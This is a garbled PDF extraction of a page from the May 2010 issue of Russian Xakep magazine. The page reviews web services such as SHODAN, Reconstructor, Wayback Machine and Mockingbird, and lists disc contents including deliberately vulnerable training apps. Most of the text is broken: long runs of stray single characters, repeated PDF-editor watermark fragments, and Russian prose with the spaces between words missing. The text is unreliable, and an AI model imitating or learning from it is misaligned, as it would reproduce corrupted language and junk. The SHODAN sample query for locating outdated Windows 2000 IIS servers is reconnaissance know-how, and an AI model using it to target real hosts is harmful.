NetBSD 5.0.2

System Rescue CD 1.5.0

>Площадка для хакера

Damn Vulnerable App 1.0.6

moth 0.6

Mutillidae 1.3

SecuriBench .91a

VMvicnum 1.4

WebGoat 5.2

WebMaven 1.01

№ 05(136)МАЙ 2010

x

 

w

w

 

 

 

D

w

 

 

 

 

 

P

 

 

 

 

 

 

 

 

 

F

.

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

-

f Click

 

 

 

 

 

X

d

 

 

 

 

 

 

 

 

-

 

 

to

 

 

 

 

C

x

 

 

 

 

 

 

h

c

 

 

 

BUY

 

 

 

a

h

 

 

 

 

 

 

n

a

 

 

 

 

 

 

 

 

g

n

 

 

 

 

NOW!

 

e

 

 

 

 

 

 

 

 

E

g

 

 

 

 

 

 

 

 

e

 

 

 

 

 

 

 

 

d

.

 

 

 

 

 

 

 

 

i

c

 

 

 

 

 

 

 

o

 

 

 

 

 

 

t

m

 

 

 

r

o

 

 

 

 

 

 

 

 

 

 

 

w

w

 

 

 

D

w

 

 

 

 

 

P

 

 

 

 

 

 

 

 

 

F

.

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

-

f Click

 

 

 

 

 

X

d

 

 

 

 

 

 

 

 

-

 

 

to

 

 

 

 

C

x

 

 

 

 

 

 

h

h

 

 

 

BUY

 

 

 

a

c

 

 

 

 

 

 

 

 

n

a

 

 

 

 

 

 

 

 

g

n

 

 

 

 

NOW!

 

e

 

 

 

 

 

 

 

 

E

g

 

 

 

 

 

 

 

 

e

 

 

 

 

 

 

 

 

d

.

 

 

 

 

 

 

 

 

i

c

 

 

 

 

 

 

 

o

 

 

 

 

 

 

t

m

 

 

 

r

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

to

 

 

 

 

 

UNITS

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

o

m

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

 

 

p

 

 

 

 

 

HTTP://

 

 

 

 

 

 

g

 

 

 

 

 

 

 

df

 

n

e

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

WWW2

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Для поиска серверов по заданным параметрам

SHODAN www.shodanhq.com

КакбывыгляделGoogle, еслибыонискалнеинформацию, анепос-

редственносерверы? СоздателиSHODAN ответилинаэтотвопрос. Сервисзанесколькосекундпозволяетнайтисерверы/роутерыдляанализа, подходящиеподзаданныепараметры. Восновесервиса— большаябаза серверов(преждевсего, веб, нопостепеннодобавляетсяинфадляFTP/ Telnet/SSH-демонов) сиххарактеристиками, аеговеб-частьпредо- ставляетпараметризованныйпоиск. Например, еслимыхотимнайти серверы, накоторыхустановленApache, тозадаемвпоиске«Apache»

— иполучаемогромныйпереченьресурсов. Уточняемверсию: «apache 2.2.3» — списоксужается. Помимоэтого, можноиспользоватьключи country, hostname, net, os, port. Врезультатеничегонестоит, например, найтисерверынаISS, которыехостятсянавиндеинаходятсявШтатах: «Microsoft IIS os:"windows 2000" country:US».

Для создания своего собственного Linux

RECONSTRUCTOR www.reconstructor.org

ВодномизWWW2 ярассказывалосервисеSUSE Studio (susestudio. com) длясборкисобственногодистрибутиванабазеSUSE Linux. Теперь жеблагодаряинструментуReconstructor такаявозможностьестьидля фанатовUbuntu иDebian. ВдвасчетаможнособратькастомайзныйLinux, полностьюподогнавегоподсебя. Тысамвыбираешьнужныепакеты, модули, графическуюоболочку, можешьнастраиватьконфиги, добавлять впроектпроизвольныефайлы. ПриэтомработатьнаLinux’есвоеймечты можноколлективно, совместносдругимипользователямисервиса.

Для просмотра умерших сайтов

WAYBACK MACHINE web.archive.org

Есливдругкакой-торесурсперестаетсуществоватьилипростопадает, переставаяотвечатьнавопросы, акакая-тоегочастькровьизносакак нужна, напомощьприходятдваинструмента. Во-первых, сохраненные копииможнопопробоватьвытащитьизкэшаGoolge илидругихпоисковиков. Аво-вторых, естьWayback Machine, окотороймногоктослышал, номалоктопользуется. Последняяотличаетсятем, чтоделаетполную копиюресурса, включаякартинкиифайлы, причемсохраняетисторию версий. Так, когдамненедавносталоинтересно, чтожезатроянбылв софтедляаккумуляторовEnergizer (подробнеечитайвMEGANEWS), я смогскачатьегоизархиваWayback Machine, несмотрянаточтофайловс зараженнойпрограммойнаоригинальномсайтеидажессылокнанихв кэшегуглауженебыло.

Для создания каркаса веб-сайта

MOCKINGBIRD www.gomockingbird.com

Когдамненужносделатьпрототипиликаркасдляприложенияили веб-сайта, яобычноиспользуюзамечательнуюпрограммуAxure RP (www.axure.com). Другиерешенияпоразнымпричинамнеподходили, и воттеперь, наконец, появиласьальтернатива. Свежаянаходка— сервис mockingbird, позволяющийвудобнейшейформенабросатькаркасдля сайтаиливеб-админки. Процесспроектированияудивляетсвоейпростотой. Причемшаблоныдляразныхчастейсайтаможносвязатьмежду собойиинтуитивномеждунимиперемещаться. Взавершениеможно расшаритьсампроектилиэкспортироватьрезультатвPNG/PDF файл.

144

XÀÊÅÐ 05 /136/ 10

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

 

 

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

t

 

 

F

 

 

 

 

 

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

 

o

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

 

Соседние файлы в папке журнал хакер